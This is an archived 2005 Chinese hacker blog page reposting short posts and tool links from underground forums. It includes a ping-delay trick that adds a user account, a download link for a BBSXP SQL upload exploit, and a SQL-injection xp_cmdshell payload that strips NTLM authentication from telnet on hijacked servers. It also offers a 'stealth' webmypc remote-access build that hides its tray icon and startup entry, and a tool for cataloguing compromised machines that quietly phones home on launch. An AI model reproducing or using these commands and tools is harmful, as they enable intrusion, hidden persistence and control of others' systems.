鬼仔's Blog

批处版——SC

2005/04/16 1:16 | 鬼仔 | 技术文章 | 消灭0留言

作者：netpatch
来源：邪恶八进制中国

说明：
批处版——SC

首先要感谢zzzEVAzzz，这个批处程序就是根据他发布的《Do All in Cmd Shell》文中的资料编写而成！
原理就是根据INF文件的功能（关于inf文件的详细信息，可以参考DDK帮助文档。）加以自动化编写而成！
难度很低，偶只用了十来分钟就编写出了这个批处程序。（高手看了不要笑哦……）

具体用法：

安装服务语法为：
np 服务名 /a 服务显示名称服务描述启动类型要添加成服务的程序地址 /s
例子：
例如我要安装一个名为test的服务，其服务的显示名为：This is test 服务描述为：experimentation
要添加为服务的程序路径为c:\winnt\system32\test.exe 启动类型为：自动并且安装后立即启动

首先把test.exe copy到c:\winnt\system32\
阅读全文 »

Tags: SC

一句命令实现定时运行某程序（或别的命令）

2005/04/15 9:46 | 鬼仔 | 技术文章 | 才 1 条评论

作者：netpatch 来源：http://www.icehack.com/

偶在邪恶八进制那闲逛时看到一个贴《如何定义一个命令20分钟后运行？》
帖子作者（redbin）申明如下：
PS：不允许使用程序解决，不允许使用计划任务解决，请大家来指点下下！！！

回去研究后终于发现了一个办法可以实现定时（其实是延时）来运行某个程序或（命令）特贴出来共享一下
命令如下：
ping 127.0.0.1 -n 1200&net user netpatch /add
就是利用Ping命令的-n参数Ping自己1200下ping完后（也就是20分钟后）执行添加netpatch用户命令
这样就达到了定时运行某程序（命令）的目的了~~

有错误请指出！谢谢！
有什么更好的办法请贴出来~大家一起共享

BBSXP SQL版 Upfile EXP

2005/04/15 9:39 | 鬼仔 | 工具收集 | 消灭0留言

软件作者：臭要饭的

下载:http://666w.com/down/view.asp?id=881

BBSXP SQL版 EXP 通杀版免费公布！几乎所有的通杀版本 for mssql
BY 臭要饭的!

Tags: BBSXP, Exploit

《精通批处理教程》

2005/04/15 9:36 | 鬼仔 | 技术文章 | 消灭0留言

来源：邪恶八进制中国
文章作者：雪莲蓬

小引：
最近好多猜测弱口令的病毒在网上流行，比如前段时间闹得很厉害的Worm.Dvldr 蠕虫就是一个典型。这些病毒有个共同点就是利用批处理来进行ipc$连接，从而来猜测管理员的口令达到控制服务器的目的。病毒由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程，但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流，发现他们对于批处理很感兴趣，多多少少了解一些命令的用法，但缺乏比较系统的了解，所以特意写下这篇教程，好让感兴趣的朋友对批处理有个整体的认识，并能通过该教程举一反三，写出自己的批处理。
该教程一共分为4大部分，第一部分是批处理的专用命令，第二部分是特殊的符号与批处理，第三部分是批处理与变量，第四部分是完整案例。因为教程比较长，所有在杂志上我们将分为两次连载，本期首先刊登一、二两部分，敬请读者注意。

阅读全文 »

Tags: BAT, 批处理

告诉大家一个小技巧一直没人提到过的东东

2005/04/15 9:34 | 鬼仔 | 技术文章 | 才 1 条评论

很早以前的东西了
觉得有用
放到上面

文章作者：紫幻[EST顾问团成员]
信息来源：邪恶八进制中国

相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候，但是最讨厌的就是ntlm认证了，以前大家去掉ntlm的方法一般有2种。

1 上传ntml.exe 这种方法有很多缺点，比如：对方有杀毒软件，很多网段屏蔽了TFTP.

2 直接写入telnet的配置信息到文本中然后在用shell执行。这种办法非常麻烦。

今天我给大家介绍我一直在使用的办法，压箱底的哦。

那就是直接运行命令：tlntadmn config sec = -ntlm

注射的话可以直接运行：;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'–
运行以后就去掉了该死的ntlm认证：）赶快去试试吧。

深入分析进程PID相同的奥秘

2005/04/15 9:33 | 鬼仔 | 技术文章 | 消灭0留言

文章作者：sunwear [E.S.T] [email protected]
信息来源：邪恶八进制安全小组

不同的进程真的不能够拥有相同的PID么？我相信大部分人都会说，这是不可能的，因为PID是在操作系统中表示进程的唯一性标示，因此不可能出现不同的进程拥有相同的PID，否则在系统调度的时候就会出现混乱。可是真的是这样么？有这样一个程序xxxx，当我们用xxx工具来观察系统中的pid。我们发现，在这个程序运行时，系统中竟然出现了不同的进程拥有了相同的pid。这是为什么？我们的理解与我们看到的现象竟然出现了矛盾。
首先让我们来了解一下EPROCESS结构。每个Windows 2000进程都由一个执行程序进程(EPROCESS)块表示,也就是说在内核中，进程是靠EPROCESS来识别的.下面是EPROCESS的结构定义
typedef struct _EPROCESS {
阅读全文 »

Tags: PID

webmypc隐蔽版

2005/04/15 9:31 | 鬼仔 | 工具收集 | 消灭0留言

文章作者：netpatch
信息来源：邪恶八进制中国

webmypc隐蔽版
本版本成功解决了系统托盘图标、注册表项问题!（启动时托盘那不会再出现令人讨厌的图标了！安装时注册表的启动项也被屏蔽了！）
在各win系统下均没问题!

如果要安装为系统服务，请用 -install命令安装！

netpatch
QQ：251592982
05-04-10

Click Here To Download

Tags: webmypc

肉鸡资料管理工具－鸡笼绝爱怀念版

2005/04/15 9:26 | 鬼仔 | 工具收集 | 消灭0留言

来源:www.hoky.org

鸡笼绝爱2005怀念版

重要的肉鸡多了，记在笔记本上查找很麻烦，用鸡笼记录每个肉鸡所开的后门端口，IP，域名，作用等等，很实用，具体怎么用大家一看就明白了！因为用广告注入器加入了本站连接，所以启动时会隐藏登陆本站一次！

登陆用户名和密码：www.xuemulove.com 进入程序后可以在工具栏里修改默认帐号和密码

怀念N年前用56K小猫入侵小日本服务器的日子！怀念DFCG，怀念牛族，怀念她～～～^_^

绝爱雪幕情感

Click Here To Download

Tags: 肉鸡